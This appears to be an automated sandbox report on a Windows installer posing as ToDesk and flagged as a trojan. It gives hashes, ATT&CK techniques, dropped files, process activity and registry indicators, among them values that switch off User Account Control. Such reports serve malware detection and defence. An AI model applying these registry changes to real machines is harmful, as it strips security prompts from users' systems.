ba850dc72644dbd24c699b4f8f3c4856801af23c36e14d724e061b814cd0832a

Analysis

max time kernel
144s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-10-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ToDesk (2)_2.exe
Size

109.3MB
MD5

496bcf85e4f82955c986a9969de65425
SHA1

a1d8c23621fdd405563d8cea6444c42da0315d38
SHA256

ba850dc72644dbd24c699b4f8f3c4856801af23c36e14d724e061b814cd0832a
SHA512

3f599613b950dfc3396891e9320dc09b476d80bae065a84f88acb65b7cf702da96057e740c34afc6f91af3436ef80400501f0aab2d422cab90484a90d9cda915
SSDEEP

3145728:rcGbmu6HFehEsw0Zfma2r9N8Qf0L8Brwm:Ilehdw0Zea2rThf1t

Score

10^/10

discovery evasion persistence privilege_escalation trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000019c74-63.dat	acprotect

Executes dropped EXE 4 IoCs

pid	Process
2800	irsetup.exe
2036	ToDesk (2).exe
1896	MSI5B9D.tmp
1636	MFTVMornitor.exe

Loads dropped DLL 15 IoCs

pid	Process
2144	ToDesk (2)_2.exe
2144	ToDesk (2)_2.exe
2144	ToDesk (2)_2.exe
2144	ToDesk (2)_2.exe
2800	irsetup.exe
2800	irsetup.exe
2036	ToDesk (2).exe
2036	ToDesk (2).exe
2036	ToDesk (2).exe
3000	MsiExec.exe
3000	MsiExec.exe
3000	MsiExec.exe
2964	msiexec.exe
1636	MFTVMornitor.exe
1636	MFTVMornitor.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000019438-3.dat	upx
behavioral1/memory/2144-6-0x0000000003370000-0x000000000373B000-memory.dmp	upx
behavioral1/memory/2800-18-0x0000000000400000-0x00000000007CB000-memory.dmp	upx
behavioral1/memory/2800-53-0x0000000000400000-0x00000000007CB000-memory.dmp	upx
behavioral1/memory/2036-64-0x0000000074500000-0x00000000745BA000-memory.dmp	upx
behavioral1/files/0x0006000000019c74-63.dat	upx
behavioral1/memory/2036-128-0x0000000074500000-0x00000000745BA000-memory.dmp	upx

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\SSD\SSD\cache_18_2	msiexec.exe
File created	C:\Program Files\SSD\SSD\cache_18_3	msiexec.exe
File created	C:\Program Files\SSD\SSD\cache_18_4	msiexec.exe
File created	C:\Program Files\SSD\SSD\ddd.exe	msiexec.exe
File created	C:\Program Files\SSD\SSD\cache_18_0	msiexec.exe
File created	C:\Program Files\SSD\SSD\cache_18_1	msiexec.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI5978.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A82.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\f775792.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI581F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI58DB.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File created	C:\Windows\Installer\f775792.msi	msiexec.exe
File created	C:\Windows\Installer\f775795.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B9D.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File created	C:\Windows\Installer\f775797.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f775795.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MFTVMornitor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ToDesk (2)_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	irsetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ToDesk (2).exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2520	ipconfig.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Microsoft Management Console	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	mmc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	MSI5B9D.tmp
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Microsoft Management Console\Recent File List	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Microsoft Management Console\Settings	mmc.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSI5B9D.tmp
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@mmcbase.dll,-14008 = "Folder"	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	mmc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe

Modifies registry class 23 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\LastUsedSource = "n;1;C:\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\ProductName = "SSD"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\PackageName = "SSD-w.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A6436633746B9E645B5569C70BF5CEB5	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A6436633746B9E645B5569C70BF5CEB5\03F481EDAF9460B43B585B8895547A4D	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\Language = "2052"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\Net\1 = "C:\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03F481EDAF9460B43B585B8895547A4D	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\PackageCode = "2D504149530C5BE43B5E7C8D465DD45A"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03F481EDAF9460B43B585B8895547A4D\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03F481EDAF9460B43B585B8895547A4D	msiexec.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2964	msiexec.exe
2964	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2668	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2668	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeSecurityPrivilege	2964	msiexec.exe
Token: SeCreateTokenPrivilege	2668	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2668	msiexec.exe
Token: SeLockMemoryPrivilege	2668	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2668	msiexec.exe
Token: SeMachineAccountPrivilege	2668	msiexec.exe
Token: SeTcbPrivilege	2668	msiexec.exe
Token: SeSecurityPrivilege	2668	msiexec.exe
Token: SeTakeOwnershipPrivilege	2668	msiexec.exe
Token: SeLoadDriverPrivilege	2668	msiexec.exe
Token: SeSystemProfilePrivilege	2668	msiexec.exe
Token: SeSystemtimePrivilege	2668	msiexec.exe
Token: SeProfSingleProcessPrivilege	2668	msiexec.exe
Token: SeIncBasePriorityPrivilege	2668	msiexec.exe
Token: SeCreatePagefilePrivilege	2668	msiexec.exe
Token: SeCreatePermanentPrivilege	2668	msiexec.exe
Token: SeBackupPrivilege	2668	msiexec.exe
Token: SeRestorePrivilege	2668	msiexec.exe
Token: SeShutdownPrivilege	2668	msiexec.exe
Token: SeDebugPrivilege	2668	msiexec.exe
Token: SeAuditPrivilege	2668	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2668	msiexec.exe
Token: SeChangeNotifyPrivilege	2668	msiexec.exe
Token: SeRemoteShutdownPrivilege	2668	msiexec.exe
Token: SeUndockPrivilege	2668	msiexec.exe
Token: SeSyncAgentPrivilege	2668	msiexec.exe
Token: SeEnableDelegationPrivilege	2668	msiexec.exe
Token: SeManageVolumePrivilege	2668	msiexec.exe
Token: SeImpersonatePrivilege	2668	msiexec.exe
Token: SeCreateGlobalPrivilege	2668	msiexec.exe
Token: SeBackupPrivilege	2052	vssvc.exe
Token: SeRestorePrivilege	2052	vssvc.exe
Token: SeAuditPrivilege	2052	vssvc.exe
Token: SeBackupPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2084	DrvInst.exe
Token: SeLoadDriverPrivilege	2084	DrvInst.exe
Token: SeLoadDriverPrivilege	2084	DrvInst.exe
Token: SeLoadDriverPrivilege	2084	DrvInst.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe
Token: SeTakeOwnershipPrivilege	2964	msiexec.exe
Token: SeRestorePrivilege	2964	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2668	msiexec.exe
2668	msiexec.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2800	irsetup.exe
2800	irsetup.exe
996	mmc.exe
996	mmc.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2144 wrote to memory of 2800	2144	ToDesk (2)_2.exe	30
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2668	2800	irsetup.exe	31
PID 2800 wrote to memory of 2036	2800	irsetup.exe	32
PID 2800 wrote to memory of 2036	2800	irsetup.exe	32
PID 2800 wrote to memory of 2036	2800	irsetup.exe	32
PID 2800 wrote to memory of 2036	2800	irsetup.exe	32
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 3000	2964	msiexec.exe	37
PID 2964 wrote to memory of 1896	2964	msiexec.exe	38
PID 2964 wrote to memory of 1896	2964	msiexec.exe	38
PID 2964 wrote to memory of 1896	2964	msiexec.exe	38
PID 1896 wrote to memory of 1348	1896	MSI5B9D.tmp	39
PID 1896 wrote to memory of 1348	1896	MSI5B9D.tmp	39
PID 1896 wrote to memory of 1348	1896	MSI5B9D.tmp	39
PID 1348 wrote to memory of 2520	1348	cmd.exe	41
PID 1348 wrote to memory of 2520	1348	cmd.exe	41
PID 1348 wrote to memory of 2520	1348	cmd.exe	41
PID 1896 wrote to memory of 1940	1896	MSI5B9D.tmp	42
PID 1896 wrote to memory of 1940	1896	MSI5B9D.tmp	42
PID 1896 wrote to memory of 1940	1896	MSI5B9D.tmp	42
PID 1896 wrote to memory of 2492	1896	MSI5B9D.tmp	44
PID 1896 wrote to memory of 2492	1896	MSI5B9D.tmp	44
PID 1896 wrote to memory of 2492	1896	MSI5B9D.tmp	44
PID 2492 wrote to memory of 2032	2492	cmd.exe	46
PID 2492 wrote to memory of 2032	2492	cmd.exe	46
PID 2492 wrote to memory of 2032	2492	cmd.exe	46
PID 2492 wrote to memory of 2848	2492	cmd.exe	47
PID 2492 wrote to memory of 2848	2492	cmd.exe	47
PID 2492 wrote to memory of 2848	2492	cmd.exe	47
PID 2492 wrote to memory of 2628	2492	cmd.exe	48
PID 2492 wrote to memory of 2628	2492	cmd.exe	48
PID 2492 wrote to memory of 2628	2492	cmd.exe	48
PID 1896 wrote to memory of 1816	1896	MSI5B9D.tmp	49
PID 1896 wrote to memory of 1816	1896	MSI5B9D.tmp	49
PID 1896 wrote to memory of 1816	1896	MSI5B9D.tmp	49
PID 996 wrote to memory of 1636	996	mmc.exe	52
PID 996 wrote to memory of 1636	996	mmc.exe	52
PID 996 wrote to memory of 1636	996	mmc.exe	52
PID 996 wrote to memory of 1636	996	mmc.exe	52

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe
"C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1742194 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-1846800975-3917212583-2893086201-1000"
